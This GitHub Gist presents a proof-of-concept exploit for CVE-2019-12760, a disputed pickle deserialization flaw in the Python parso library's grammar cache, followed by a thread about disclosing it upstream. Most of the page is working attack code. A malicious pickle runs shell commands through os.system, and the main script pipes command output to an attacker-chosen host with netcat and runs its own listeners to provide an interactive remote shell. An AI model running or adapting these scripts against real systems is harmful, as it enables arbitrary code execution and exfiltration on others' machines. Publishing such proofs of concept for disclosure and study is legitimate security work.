** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."
Last active
February 16, 2022 08:13
-
-
Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import parso | |
import pickle | |
import random | |
import shutil | |
import threading | |
from hashlib import sha256 | |
from os import makedirs, remove, system | |
from os.path import dirname, exists, join | |
from six import b, u | |
from subprocess import Popen, PIPE | |
from sys import version_info as v | |
from tinyscript import * | |
__author__ = "Alexandre D'Hondt" | |
__version__ = "1.0" | |
__copyright__ = "AGPLv3 (http://www.gnu.org/licenses/agpl.html)" | |
__doc__ = """ | |
This Proof-of-Concept exploit leverages cache loading of the parso library. | |
It requires the attacker to be able to create a folder and to write files on | |
the target. It guesses the path to a cache file, writes an evil pickled object | |
to it and, while triggering grammar loading, makes the vulnerable application | |
load the evil pickle to allow Arbitrary Code Execution. | |
""" | |
# ------------------------- FUNCTIONS TO BE CUSTOMIZED ------------------------- | |
def get_payload(command, lhost, lport):
    """Serialize an object whose unpickling runs *command* through the shell.

    The command line is piped into Netcat, which sends the command's output
    to ``lhost:lport``.

    :param command: shell command line to embed in the pickle
    :param lhost:   address Netcat connects to
    :param lport:   port Netcat connects to
    :return:        the serialized object, as returned by ``pickle.dumps``
    """
    # TODO: implement here the logic to send remote command result to attacker's
    #        host (i.e. if Netcat is not present on the remote server)
    piped_command = "{} | nc -n {} {} -w 1".format(command, lhost, lport)

    class PoC(object):
        def __reduce__(self):
            # pickle stores this (callable, args) pair and calls it on load
            return system, (piped_command,)

    return pickle.dumps(PoC())
def remove_from_target(host, port, abspath):
    """Delete the file located at *abspath*.

    This placeholder works on the local filesystem only; *host* and *port*
    are accepted for the future remote implementation and are not used.

    :param host:    target address (unused here)
    :param port:    target port (unused here)
    :param abspath: absolute path of the file to delete
    """
    # TODO: implement here the logic to remove a file from the remote server
    remove(abspath)
def trigger_grammar_processing(dummy_path, cache_path):
    """Ask parso to parse *dummy_path* with caching enabled.

    The default grammar is loaded and its ``parse`` method is called with
    ``cache=True`` and the given cache directory. Errors raised by the parse
    call are ignored.

    :param dummy_path: path of the file handed to parso
    :param cache_path: directory parso is told to use as its cache
    """
    # TODO: implement here the logic to trigger grammar processing by parso on
    #        the remote server
    grammar = parso.load_grammar()
    try:
        grammar.parse(path=dummy_path, cache=True, cache_path=cache_path)
    except Exception:
        # Best effort: a failing parse is not an error for the caller. Unlike
        # a bare ``except``, this still lets KeyboardInterrupt and SystemExit
        # propagate so the operator can interrupt the script.
        pass
def write_to_target(host, port, abspath, content=""):
    """Write *content* to the file at *abspath*, creating its folder if needed.

    This placeholder works on the local filesystem only; *host* and *port*
    are accepted for the future remote implementation and are not used.

    :param host:    target address (unused here)
    :param port:    target port (unused here)
    :param abspath: absolute path of the file to write
    :param content: data to write; it goes through ``six.b`` first
    """
    # TODO: implement here the logic to write a file to the remote server
    # NOTE(review): six.b is meant for text literals; confirm how it behaves
    #               when content is already a bytes object on Python 3
    folder = dirname(abspath)
    if not exists(folder):
        makedirs(folder)
    with open(abspath, 'wb') as handle:
        handle.write(b(content))
    logger.debug("> File written to '%s'" % abspath)
# ----------------------------- STATIC FUNCTIONS ------------------------------- | |
class Listener(object):
    """Netcat listener that runs in its own thread.

    Each round picks a random port different from the previous one, stores it
    in ``args.lport``, runs ``nc`` in listening mode on it and prints what
    Netcat wrote to its standard output.
    """

    def __init__(self):
        # options passed to every Popen call made by run()
        self.kwargs = {'stdout': PIPE, 'stderr': PIPE, 'shell': True}
        # run() keeps looping until this is set to 0
        self.state = 1
        self.thread = threading.Thread(target=self.run)

    def run(self):
        """Start one Netcat listener after another until ``state`` is 0."""
        global args
        args.lport = 0
        previous_port = 0
        while self.state != 0:
            # draw again until the port differs from the one used last round
            while args.lport == previous_port:
                args.lport = random.randint(12345, 45678)
            logger.debug("Starting new listener on port {}".format(args.lport))
            self.args = ("nc -nlvp {}".format(args.lport), )
            process = Popen(*self.args, **self.kwargs)
            out, _ = process.communicate()
            try:
                print(out.decode('utf-8'))
            except:
                # fall back to the raw representation of the captured output
                print(u(str(out)))
            previous_port = args.lport
def cache_filepath(cache_path, python_implem, dummy_path, version):
    """Guess the path of the parso cache file associated with *dummy_path*.

    The file name combines the SHA-256 of the local grammar file for
    *version* with the SHA-256 of *dummy_path*; the folder name combines the
    Python implementation, the version digits and parso's pickle version.

    :param cache_path:    root folder of the cache
    :param python_implem: Python implementation name (e.g. "CPython")
    :param dummy_path:    path of the file that will be parsed
    :param version:       Python major and minor version digits (e.g. "36")
    :return:              the guessed cache file path
    """
    # we take the hash from the grammar on the local host, thus assuming it is
    #  the same as target's one given Python's version
    grammar_file = join(dirname(parso.__file__), "python",
                        "grammar%s.txt" % version)
    # read through a context manager so the file handle is always closed
    with open(grammar_file) as f:
        grammar_hash = sha256(f.read().encode("utf-8")).hexdigest()
    path_hash = sha256(dummy_path.encode("utf-8")).hexdigest()
    filepath = "%s/%s-%s-%i/%s-%s.pkl" % (cache_path, python_implem, version,
                                          parso.cache._PICKLE_VERSION,
                                          grammar_hash, path_hash)
    logger.debug("> Cache path: %s" % filepath)
    return filepath
def start_shell():
    """Run the interactive prompt loop of the proof-of-concept.

    A Listener thread is started, then each round writes a dummy file,
    computes the matching cache file path, reads a command from the prompt,
    writes the payload for it to the cache file, triggers grammar processing
    and removes both files. An empty line restarts the round; "exit" or
    "quit" stops the listener, removes the cache folder and returns.
    """
    global args
    logger.debug("Starting shell...")
    # Pick the line-reading builtin once: raw_input on Python 2, input on
    #  Python 3. Only NameError is caught, so EOF or Ctrl-C at the prompt is
    #  no longer swallowed and retried through input(), which evaluates the
    #  typed text on Python 2.
    try:
        read_line = raw_input
    except NameError:
        read_line = input
    rhost, rport, lhost = args.rhost, args.rport, args.lhost
    implem, pyversion, rdir = args.implem, args.python, args.rdir
    listener = Listener()
    listener.thread.start()
    cnt = 0
    while True:
        dummy = join(rdir, "dummy{}".format(cnt))
        write_to_target(rhost, rport, dummy)
        cpath = cache_filepath(rdir, implem, dummy, pyversion)
        cmd = read_line("> ").strip()
        if cmd == "":
            continue
        if cmd in ("exit", "quit"):
            listener.state = 0
            logger.debug("Killing Netcat instances...")
            Popen("killall -9 nc", shell=True)
            logger.debug("Joining Netcat thread...")
            listener.thread.join(1)
            logger.debug("Removing artifacts...")
            shutil.rmtree(args.rdir)
            return
        # args.lport is read here, at use time, because the listener thread
        #  updates it whenever it moves to a new port
        write_to_target(rhost, rport, cpath,
                        get_payload(cmd, lhost, args.lport))
        trigger_grammar_processing(dummy, rdir)
        remove_from_target(rhost, rport, cpath)
        remove_from_target(rhost, rport, dummy)
        cnt += 1
# -------------------------- SCRIPT'S EXECUTABLE PART -------------------------- | |
if __name__ == '__main__':
    # `parser` and `initialize` are not defined in this file; presumably they
    #  are provided by the `from tinyscript import *` star import
    global args
    target = parser.add_argument_group("Target options")
    target.add_argument("-d", "--cache-dir", dest="rdir", default="/tmp/parso",
                        help="cache absolute folder")
    target.add_argument("-i", "--implem", default="CPython",
                        choices=["CPython", "IronPython", "Jython", "PyPy"],
                        help="platform Python's implementation")
    # help texts below used to read "local host ..." (copied from --lhost)
    target.add_argument("--rhost", default="127.0.0.1",
                        help="remote host address")
    target.add_argument("--rport", default=80, type=int,
                        help="remote host port")
    target.add_argument("-p", "--python", default="36",
                        help="Python major and minor version digits")
    payload = parser.add_argument_group("Payload options")
    payload.add_argument("--lhost", default="127.0.0.1",
                         help="local host address")
    initialize()
    start_shell()
Of course I did, nearly 6 months ago...
Alex writes:
Of course I did, nearly 6 months ago...
Have you received any reply or updates from them?
Yes, I did. The developer told me he would fix it within a few weeks.
NB: I think this is very unlikely to be exploited in the wild, but it should be fixed nonetheless.
Alex writes:
Yes, I did. The developer told me he would fix it within a few weeks.
NB: I think this is very unlikely to be exploited in the wild, but it should be fixed nonetheless.
Have you then recontacted him before CVE-2019-12760 was published?
In any case I think it would be better to file a public issue upstream
now that the problem is public. Can you please file it?
Thank you!
Have you then recontacted him before CVE-2019-12760 was published?
Not yet, as I'm busy with other matters. I published this as a Gist for the record, also because it has kind of timed out regarding responsible disclosure, and for what it's worth.
In any case I think it would be better to file a public issue upstream now that the problem is public. Can you please file it?
You're right, I will open an issue on the related GitHub repo soon.
JFTR this was reported upstream via davidhalter/parso#75.
Thank you!
Simpler proof-of-concept script:
#!/usr/bin/python
import parso
import pickle
import sys
from hashlib import sha256
from os import makedirs, system
from os.path import dirname, exists, join
from six import b
__author__ = "Alexandre D'Hondt"
# Step 1: create the empty file that parso will be asked to parse
print("\n1. Writing a dummy empty file...")
dummy = "/tmp/dummy"
with open(dummy, 'wb') as f:
    f.write(b(""))
print(" > %s" % dummy)

# Step 2: rebuild the cache file path from the grammar and dummy path hashes
print("\n2. Computing cache file's path...")
pyversion = "".join(sys.version.split(".")[:2])
grammar = join(dirname(parso.__file__), "python", "grammar%s.txt" % pyversion)
pickle_version = parso.cache._PICKLE_VERSION
grammar_hash = sha256(open(grammar).read().encode("utf-8")).hexdigest()
dummy_hash = sha256(dummy.encode("utf-8")).hexdigest()
cache = "/tmp/parso/CPython-%s-%i/%s-%s.pkl" % (
    pyversion, pickle_version, grammar_hash, dummy_hash)
print(" > %s" % cache)
cache_dir = dirname(cache)
if not exists(cache_dir):
    makedirs(cache_dir)

# Step 3: store a pickle whose loading calls system("ls")
print("\n3. Writing a evil cache file (with a pickle payload)...")


class PoC(object):
    def __reduce__(self):
        return system, ("ls", )


with open(cache, 'wb') as f:
    f.write(pickle.dumps(PoC()))
print(" > done")

# Step 4: parse the dummy file with caching enabled on the same cache folder
print("\n4. Triggering grammar parsing...")
g = parso.load_grammar()
try:
    print("\nCommand's result:\n")
    g.parse(path=dummy, cache=True, cache_path="/tmp/parso")
except Exception:
    # errors raised while parsing are ignored
    pass
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello!
Have you shared that with upstream? If not, can you please share it?
Thank you!